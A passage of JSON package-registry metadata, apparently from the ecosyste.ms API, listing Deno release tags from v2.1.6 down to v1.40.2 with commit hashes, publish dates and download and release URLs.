0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.g